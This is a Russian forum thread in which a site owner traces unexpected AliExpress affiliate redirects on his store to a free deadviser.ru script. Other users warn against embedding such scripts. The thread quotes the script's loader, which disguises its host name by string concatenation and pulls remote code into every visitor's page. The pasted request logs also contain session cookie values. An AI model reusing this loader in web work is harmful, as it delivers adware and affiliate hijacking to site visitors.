Перейти к публикации
Поиск в
  • Дополнительно...
Искать результаты, содержащие...
Искать результаты в...

Вирус? ALIEXPRESS


kolek5520
 Поделиться

Рекомендованные сообщения

Добрый день всем.
Гонял сайт через  сервис http://www.webpagetest.org

 

и заметил, среди запросов, странные ведущие на ALIEXPRESS  И com-sale.ru

https://yadi.sk/i/Nhiz-49D3QpYV5

Спойлер

 


+ Request 176: https://passport.alibaba.com/jump.htm?toURL=http%3A%2F%2Fs.click.aliexpress.com%2Fe%2FZJmQJiA
- Request 177: http://s.click.aliexpress.com/e/ZJmQJiA
URL: http://s.click.aliexpress.com/e/ZJmQJiA
Host: s.click.aliexpress.com
IP: 104.81.62.228
Error/Status Code: 302
Priority: VeryHigh
Protocol: http/1.1
Initiated By: http://com-sale.ru/page/index.php?id=1 line 0
Client Port: 42588
Request Start: 10.142 s
DNS Lookup: 30 ms
Initial Connection: 29 ms
Time to First Byte: 279 ms
Bytes In (downloaded): 0.0 KB
Bytes Out (uploaded): 0.9 KB
Request Headers:

GET /e/ZJmQJiA HTTP/1.1
Host: s.click.aliexpress.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 PTST/171219.181244
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ali_apache_id=10.83.238.12.1513854934920.174641.2; xman_us_f=x_l=0&x_locale=ru_RU; intl_locale=ru_RU; aep_usuc_f=region=RU&site=rus&b_locale=ru_RU&c_tp=RUB; xman_t=F9YbP/lSCzgPr+7ppBEF+LMx+SGa5SQswoo5fpnHSrcP2Ae/Ns90QGmajS+8v961; acs_usuc_t=acs_rt=39c776d7ef5a4ff9bfe8539e248a54f5; intl_common_forever=EHsqcZ9jWDOZwDyDP7U0y0b/waIXjuzZs4YilNI2JzEpjgrgjR7RfA==; xman_f=tA8OW6neH5aj7dRBKZslhg8SKBFHmiy6pvtOJI6LHYID8bYPYMCpBL8hgJdIUypUuXO6GcNYYay81csJPG5KTC+aYpBpDIYyjDbxv+NmZTXmcJXEdmpYaw==
Response Headers:

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
P3P: CP="CAO PSA OUR"
X-Application-Context: affiliateclick:prod,production:7001
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
Location: http://ru.aliexpress.com/af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5
Content-Language: en-US
Server: Tengine/Aserver
Timing-Allow-Origin: *
Date: Thu, 21 Dec 2017 11:15:36 GMT
Connection: keep-alive
Set-Cookie: xman_us_f=x_locale=ru_RU&x_l=0&x_as_i=%7B%22cv%22%3A%221%22%2C%22tp1%22%3A%22comsale%22%2C%22src%22%3A%22promotion%22%2C%22af%22%3A842956180%2C%22cpt%22%3A1513854936600%2C%22channel%22%3A%22AFFILIATE%22%2C%22affiliateKey%22%3A%22ZJmQJiA%22%2C%22cn%22%3A%2210004940010%22%2C%22tagtime%22%3A1513854936606%2C%22vd%22%3A%2230%22%7D; Domain=.aliexpress.com; Expires=Tue, 08-Jan-2086 14:29:43 GMT; Path=/
Set-Cookie: acs_usuc_t=x_csrf=dylis5otzb08&acs_rt=39c776d7ef5a4ff9bfe8539e248a54f5; Domain=.aliexpress.com; Path=/
Set-Cookie: aeu_cid=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA; Domain=.aliexpress.com; Expires=Tue, 08-Jan-2086 14:29:43 GMT; Path=/
- Request 178: http://ru.aliexpress.com/af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5
URL: http://ru.aliexpress.com/af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5
Host: ru.aliexpress.com
IP: 104.81.232.172
Error/Status Code: 301
Priority: VeryHigh
Protocol: http/1.1
Initiated By: http://com-sale.ru/page/index.php?id=1 line 0
Client Port: 48324
Request Start: 10.452 s
Time to First Byte: 212 ms
Bytes In (downloaded): 0.3 KB
Bytes Out (uploaded): 1.6 KB
Request Headers:

GET /af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5 HTTP/1.1
Host: ru.aliexpress.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 PTST/171219.181244
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ali_apache_id=10.83.238.12.1513854934920.174641.2; JSESSIONID=3Q2KZA0W-TJ3RYODNMH5ABTJ7KWCM1-NP35EGBJ-2H; intl_locale=ru_RU; aep_usuc_f=region=RU&site=rus&b_locale=ru_RU&c_tp=RUB; xman_t=F9YbP/lSCzgPr+7ppBEF+LMx+SGa5SQswoo5fpnHSrcP2Ae/Ns90QGmajS+8v961; intl_common_forever=EHsqcZ9jWDOZwDyDP7U0y0b/waIXjuzZs4YilNI2JzEpjgrgjR7RfA==; xman_f=tA8OW6neH5aj7dRBKZslhg8SKBFHmiy6pvtOJI6LHYID8bYPYMCpBL8hgJdIUypUuXO6GcNYYay81csJPG5KTC+aYpBpDIYyjDbxv+NmZTXmcJXEdmpYaw==; _mle_tmp0=eNrz4A12DQ729PeL9%2FV3cfUxiKjOTLFSMg408o5yNAjXDfEyDor0d%2FHz9TB1dArxMvcOd%2FY11PULMDZ1dXfy0jXyUNJJLrEyNDU0tjA1sTQ2NTA11ElMRhPIrbAyqI0CAP7gG7k%3D; xman_us_f=x_locale=ru_RU&x_l=0&x_as_i=%7B%22cv%22%3A%221%22%2C%22tp1%22%3A%22comsale%22%2C%22src%22%3A%22promotion%22%2C%22af%22%3A842956180%2C%22cpt%22%3A1513854936600%2C%22channel%22%3A%22AFFILIATE%22%2C%22affiliateKey%22%3A%22ZJmQJiA%22%2C%22cn%22%3A%2210004940010%22%2C%22tagtime%22%3A1513854936606%2C%22vd%22%3A%2230%22%7D; acs_usuc_t=x_csrf=dylis5otzb08&acs_rt=39c776d7ef5a4ff9bfe8539e248a54f5; aeu_cid=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA
Response Headers:

HTTP/1.1 301 Moved Permanently
Content-Type: text/html
Content-Length: 286
Location: https://ru.aliexpress.com/af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5
Server: Tengine/Aserver
Timing-Allow-Origin: *
Date: Thu, 21 Dec 2017 11:15:36 GMT
Connection: keep-alive
+ Request 179: https://ru.aliexpress.com/af/category/202000020.html?aff_platform=promotion&cpt=1513854936600&sk=ZJmQJiA&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5
+ Request 180: https://mc.yandex.ru/webvisor/25275842?wmode=0&rn=486342043&page-url=https%3A%2F%2F1mango.ru%2F&wv-type=2&wv-hit=585454435&wv-part=1&browser-info=ti%3A8%3Aet%3A1513854936%3Av%3A929%3Az%3A60%3Ai%3A20171221121534%3Ast%3A1513854937%3Au%3A1513854934737472983
+ Request 181: https://ru.aliexpress.com/af/category/202000020.html?sk=ZJmQJiA&terminal_id=39c776d7ef5a4ff9bfe8539e248a54f5&cpt=1513854936600&blanktest=0&origin=n&jump=afs&aff_platform=promotion&aff_trace_key=463d6a65afc44b49b9e8fd929bcbd53d-1513854936600-07767-ZJmQJiA&CatId=202000020&catName=consumer-electronics

 

 

Изменено пользователем kolek5520
Ссылка на комментарий
Поделиться на других сайтах


Еще один сайт с варезом? Другой причины так тщательно скрывать ссылку на него не вижу. 

Ссылка на комментарий
Поделиться на других сайтах


5 минут назад, Shureg сказал:

Еще один сайт с варезом? Другой причины так тщательно скрывать ссылку на него не вижу. 

зря вы так, у меня не одного варезного модуля или темы нету - все до единого куплены. А ссылки не вставляю,т.к. в своё время подобная ссылка была проиндексироанная  и по запросу моего сайта в поиске вылазила ссылка на этот форум с разбором тех или иных проблем. 

https://yadi.sk/i/9F81yE0H3Qpf4q - не считая покупок на https://https://opencartforum.com/files// и https://www.opencart.com/

Ссылка на комментарий
Поделиться на других сайтах


15 минут назад, Shureg сказал:

Еще один сайт с варезом? Другой причины так тщательно скрывать ссылку на него не вижу. 

Кстати зря вы так, @kolek5520 лояльный пользователь и не замечен в варезе
Просто сейчас часто втихаря ломают сайты и всовывают adware, скрытые майнеры, и другую разную фигню
Даже разные дискусы и тп всовывают разную хрень
Это как эпидемия

  • +1 1
Ссылка на комментарий
Поделиться на других сайтах

17 минут назад, kolek5520 сказал:

зря вы так, у меня не одного варезного модуля или темы нету - все до единого куплены. А ссылки не вставляю,т.к. в своё время подобная ссылка была проиндексироанная  и по запросу моего сайта в поиске вылазила ссылка на этот форум с разбором тех или иных проблем. 

https://yadi.sk/i/9F81yE0H3Qpf4q - не считая покупок на https://https://opencartforum.com/files// и https://www.opencart.com/

Прошу прощения за подозрения, рад, что неправ.
Увы, слишком часто "секретность" именно "варезностью" обусловлена. У вас, к тому же, даже на картинке ссылки не найти, а была бы нелишней

Ссылка на комментарий
Поделиться на других сайтах


https://developers.google.com/speed/pagespeed/insights тоже ругается на какие то не сжатые картинки с https://ae01.alicdn.com

https://yadi.sk/i/mWeO4CUi3QphH8

В общем кто с этим знаком и может помочь, напишите в личку - не бесплатно конечно

Ссылка на комментарий
Поделиться на других сайтах


1 час назад, markimax сказал:

Кстати зря вы так, @kolek5520 лояльный пользователь и не замечен в варезе
Просто сейчас часто втихаря ломают сайты и всовывают adware, скрытые майнеры, и другую разную фигню
Даже разные дискусы и тп всовывают разную хрень
Это как эпидемия

нашел эту заразу. Ставил скрипт против яндекс советника: https://deadviser.ru/

<script type="text/javascript" async> (function () { var j = document.createElement("script"); j.type = "text/javascript"; j.src = "https://"+"deadvi"+"ser.ru/free/?"+Math.random(); document.getElementsByTagName('head')[0].appendChild(j); })(); </script>

убрал, сразу всё норм стало, вернул - сразу https://ae01.alicdn.com полезло.

Так что осторожнее с этим:mellow:

Ссылка на комментарий
Поделиться на других сайтах


1 час назад, kolek5520 сказал:

нашел эту заразу. Ставил скрипт против яндекс советника: https://deadviser.ru/


<script type="text/javascript" async> (function () { var j = document.createElement("script"); j.type = "text/javascript"; j.src = "https://"+"deadvi"+"ser.ru/free/?"+Math.random(); document.getElementsByTagName('head')[0].appendChild(j); })(); </script>

убрал, сразу всё норм стало, вернул - сразу https://ae01.alicdn.com полезло.

Так что осторожнее с этим:mellow:

Как я и предполагал

 

Мудаки  одним словом
Написано FREE
А на самом деле Adware

Ссылка на комментарий
Поделиться на других сайтах

Ребята, не вставляйте разную "бесплатную" хрень откуда попало
99.9% туда или майнер скрытый засунут, adware или маркетинговую следилку
Относится это ко всему и к разным дискусам и т п
 

Ссылка на комментарий
Поделиться на других сайтах

А я отписывал в теме про Яндекс советника тут на форуме, что все чужие скрипты Кик советник и т.д это сегодня помогают Вам, завтра будут против Вас)

Отправлено через Tapatalk

Ссылка на комментарий
Поделиться на других сайтах


36 минут назад, pimur сказал:

А я отписывал в теме про Яндекс советника тут на форуме, что все чужие скрипты Кик советник и т.д это сегодня помогают Вам, завтра будут против Вас)

Отправлено через Tapatalk
 

а как быть тогда с этим советником? как его убрать?

Ссылка на комментарий
Поделиться на других сайтах


2 часа назад, kolek5520 сказал:

а как быть тогда с этим советником? как его убрать?

Уберите разметку с цены, подмена цены и т.д

Ссылка на комментарий
Поделиться на других сайтах


Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас
 Поделиться

×
×
  • Создать...

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.